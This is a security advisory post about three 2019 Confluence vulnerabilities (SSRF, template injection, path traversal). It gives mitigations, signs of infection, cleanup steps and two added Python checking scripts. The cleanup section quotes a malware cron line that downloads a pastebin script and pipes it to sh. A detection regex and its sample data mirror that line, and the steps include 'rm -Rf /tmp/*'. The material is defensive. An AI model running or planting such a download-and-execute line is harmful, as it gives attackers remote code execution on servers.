Vulnerabilities in Atlassian Confluence are now being actively exploited by hackers

nw - 5 min read

In March, Atlassian announced that the Confluence software (Server and Data Center) contains two critical vulnerabilities, in the WebDAV and Widget Connector apps. On 17 April, another vulnerability was disclosed.

Unfortunately, we and many other solution partners have noticed that in the last few days exactly these vulnerabilities have increasingly been exploited by attackers to compromise publicly accessible Confluence instances. To protect yourself from attacks of this kind, Atlassian recommends upgrading to the latest Confluence version.

The following section provides more detailed information about the impact of these security vulnerabilities and how you can recover from such attacks.

About the security vulnerabilities

WebDAV vulnerability - CVE-2019-3395

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

Confluence Server and Data Center versions released before the 18th June 2018 are vulnerable to this issue. A remote attacker is able to exploit a Server-Side Request Forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.

All versions of Confluence Server and Confluence Data Center before version 6.6.7, from version 6.7.0 before 6.8.5 (the fixed version for 6.8.x), and from version 6.9.0 before 6.9.3 (the fixed version for 6.9.x) are affected by this vulnerability.

Widget Connector vulnerability - CVE-2019-3396

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

There was a server-side template injection vulnerability in Confluence Server and Data Center, in the Widget Connector. An attacker is able to exploit this issue to achieve server-side template injection, path traversal and remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.

All versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x) and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are affected by this vulnerability.

Path traversal in the downloadallattachments resource - CVE-2019-3398

Severity 

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs, or to create a new space or personal space, or who has 'Admin' permissions for a space, can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.

All versions of Confluence Server from 2.0.0 before 6.6.13 (the fixed version for 6.6.x), from 6.7.0 before 6.12.4 (the fixed version for 6.12.x), from 6.13.0 before 6.13.4 (the fixed version for 6.13.x), from 6.14.0 before 6.14.3 (the fixed version for 6.14.x), and from 6.15.0 before 6.15.2 are affected by this vulnerability.  

More Details: https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html

Secure your instance!

First of all: Please make sure to upgrade your Confluence instance to the latest version! This is the best way to protect yourself from this kind of cyber attack.

If you run an Enterprise release of Confluence, you only need to apply the latest minor (bugfix) update for it. If you do not run an Enterprise release and are not on one of the last two feature versions, you will have to upgrade to the latest version.

If this is not possible due to other reasons, you need to secure your instance ASAP. Here is how to proceed:

Mitigation for CVE-2019-3396

If you are unable to update Confluence immediately, you can use the following temporary workaround: go to Settings > Manage apps (add-ons), select System, and disable the following system plugins in Confluence:

  • Widget Connector plugin
  • WebDAV plugin

If you disable the Widget Connector plugin, the Widget Connector macro will not be available anymore. This macro is used to display content from websites like YouTube, Vimeo, and Twitter. Users will see an 'unknown macro' error.

If you disable the WebDAV plugin, you will not be able to connect to Confluence using a WebDAV client. Disabling this plugin will also automatically disable the Office Connector plugin, which means Office Connector features such as "Import from Word" and "Edit in Office" are no longer available. Please be aware that WebDAV is not required to edit files in Confluence 6.11 and later, so editing files remains possible in these versions.

After upgrading, you will need to manually re-enable:

  • WebDAV plugin
  • Widget Connector
  • Office Connector.

Mitigation for CVE-2019-3398

If you are unable to upgrade Confluence immediately, as a temporary workaround you should block the affected URL <base-url>/<context-path>/pages/downloadallattachments.action. Blocking this URL will prevent anyone from downloading all attachments via the attachments page or the attachments macro. Downloading individual attachments will continue to work.

To block the URL directly in Tomcat:

  1. Stop Confluence.
  2. Edit <install-directory>/conf/server.xml.
  3. Add the following inside the <Host> element:

     ```xml
     <Context path="/pages/downloadallattachments.action" docBase="">
       <Valve className="org.apache.catalina.valves.RemoteAddrValve" deny="*" />
     </Context>
     ```

     If you run Confluence with a context path, for example /wiki, you will need to include your context path in the path attribute, as shown here:

     ```xml
     <Context path="/wiki/pages/downloadallattachments.action" docBase="">
       <Valve className="org.apache.catalina.valves.RemoteAddrValve" deny="*" />
     </Context>
     ```
  4. Save the file, and restart Confluence.

To verify that the workaround was applied correctly:

  1. Navigate to a page or blog that has 2 or more attachments.
  2. Go to the page menu > Attachments and then select Download all attachments.

You should see a 404 error and no files should be downloaded.
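A mistake that is easy to make with this workaround is forgetting the context path in the path attribute, which leaves the action reachable. As an added example (not the post's or Atlassian's code), the following Python parses a server.xml and checks that every <Host> carries a RemoteAddrValve that denies everyone for the downloadallattachments action under the given context path; the server.xml fragments are constructed.

```python
# Added example (not from the original post or Atlassian): check that the
# CVE-2019-3398 Tomcat workaround is really in place by parsing server.xml.
# It verifies that every <Host> contains a <Context> whose path is the
# Confluence context path plus /pages/downloadallattachments.action, holding
# a RemoteAddrValve with deny="*". The server.xml fragments are constructed.
import xml.etree.ElementTree as ET

BLOCKED_ACTION = "/pages/downloadallattachments.action"
VALVE_CLASS = "org.apache.catalina.valves.RemoteAddrValve"


def workaround_applied(server_xml: str, context_path: str = "") -> bool:
    """Return True only if every <Host> blocks the downloadallattachments action."""
    root = ET.fromstring(server_xml)
    expected_path = context_path.rstrip("/") + BLOCKED_ACTION
    found_host = False
    for host in root.iter("Host"):
        found_host = True
        blocked = False
        for ctx in host.findall("Context"):
            if ctx.get("path") != expected_path:
                continue  # a Context for the wrong path (e.g. missing /wiki) does not count
            for valve in ctx.findall("Valve"):
                if valve.get("className") == VALVE_CLASS and valve.get("deny") == "*":
                    blocked = True
        if not blocked:
            return False
    return found_host


# Constructed server.xml for an instance served under the context path /wiki.
GOOD_XML = """<Server><Service><Engine>
<Host name="localhost" appBase="webapps">
  <Context path="/wiki/pages/downloadallattachments.action" docBase="">
    <Valve className="org.apache.catalina.valves.RemoteAddrValve" deny="*" />
  </Context>
</Host></Engine></Service></Server>"""

# Same valve, but the administrator forgot the /wiki prefix in the path attribute.
WRONG_PATH_XML = GOOD_XML.replace('path="/wiki/pages', 'path="/pages')

if __name__ == "__main__":
    print(workaround_applied(GOOD_XML, "/wiki"))        # True
    print(workaround_applied(WRONG_PATH_XML, "/wiki"))  # False
```

Run it against your real <install-directory>/conf/server.xml (read the file into a string) before relying on the 404 check from the browser alone.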

Already infected?

We are currently aware of the following effects caused by exploiting the security vulnerabilities:

  1. The instance is unreachable
  2. Unable to start the instance → process will be killed after a few seconds
  3. Heavy CPU load caused by processes run by the Confluence user under misleading names such as sshd, khugepaged or vmlinuz

If your instance shows these or similar symptoms, it may have been attacked and compromised by this malware. So far we have observed this type of malware attack on Linux systems only. Several files are created in the /tmp folder; one of them, /tmp/seasame, is the malware itself. It attempts to install itself as a service, register a cronjob and then run itself. This description is based on our current analysis, but there may be other variants out there that exploit these security vulnerabilities.

How to resolve this issue if you are affected?

The clean solution is to set up a new server and copy over only the database and the Confluence-data folder. If this is currently not possible, the following steps are a workaround:

  1. Kill the processes
  2. Clean /tmp folder e.g. rm -Rf /tmp/*
  3. (Optional) Delete the Confluence user (this prevents the malware from being executed)
  4. Check cronjobs for the malware (in addition you might want to check for a modified noop.jsp). There might be an entry like this:

     ```
     */15 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh
     ```
  5. Install the latest version of Confluence
  6. (Optional) If the Confluence user was deleted in step 3, create a new one with a different name.
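As an added example (not the post's or venITure's own tooling), the following Python scans a crontab dump and a `ps -eo user,pcpu,comm` listing for the indicators described above: a cron entry that pipes a pastebin download into sh, and processes running as the Confluence user under the misleading names the post lists. The crontab and process listing are constructed samples, and the user name `confluence` is an assumption.

```python
# Added example (not from the original post): scan crontab text and a process
# listing for the indicators this post describes: a cron entry that pipes a
# pastebin download into sh, and processes run by the Confluence user under
# misleading names. The sample data below is constructed, not real evidence.
import re
from typing import List, Tuple

# Shape of the cron line quoted in the post: curl/wget of a pastebin raw URL piped to sh.
CRON_PATTERN = re.compile(r"(curl|wget)[^\n]*pastebin\.com/raw/[^\n]*\|\s*sh")
# Names the post reports the malware hiding behind; none of them legitimately run as the app user.
SUSPICIOUS_NAMES = {"sshd", "khugepaged", "vmlinuz"}
CONFLUENCE_USER = "confluence"  # assumed service account name


def suspicious_cron_lines(crontab: str) -> List[str]:
    """Return crontab lines that download from pastebin and execute the result."""
    return [line for line in crontab.splitlines()
            if not line.lstrip().startswith("#") and CRON_PATTERN.search(line)]


def suspicious_processes(ps_output: str) -> List[Tuple[str, str]]:
    """Return (user, command) pairs from `ps -eo user,pcpu,comm` output that match."""
    hits = []
    for line in ps_output.splitlines()[1:]:  # skip the header line
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        user, _cpu, comm = parts
        if user == CONFLUENCE_USER and comm in SUSPICIOUS_NAMES:
            hits.append((user, comm))
    return hits


# Constructed sample data modelled on the post's description.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /opt/backup.sh
*/15 * * * * (curl -fsSL https://pastebin.com/raw/EXAMPLE||wget -q -O- https://pastebin.com/raw/EXAMPLE)|sh
"""
SAMPLE_PS = """USER     %CPU COMMAND
root      0.0 sshd
confluence 1.2 java
confluence 98.7 khugepaged
"""

if __name__ == "__main__":
    print(suspicious_cron_lines(SAMPLE_CRONTAB))
    print(suspicious_processes(SAMPLE_PS))
```

On a live host, feed it the output of `crontab -l -u confluence` (and the system crontabs under /etc) and of `ps -eo user,pcpu,comm`.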

Please feel free to contact venITure, if you have any questions regarding this issue or if you need any type of technical support in this matter. (service@venITure.net or +49 221 985 9240)
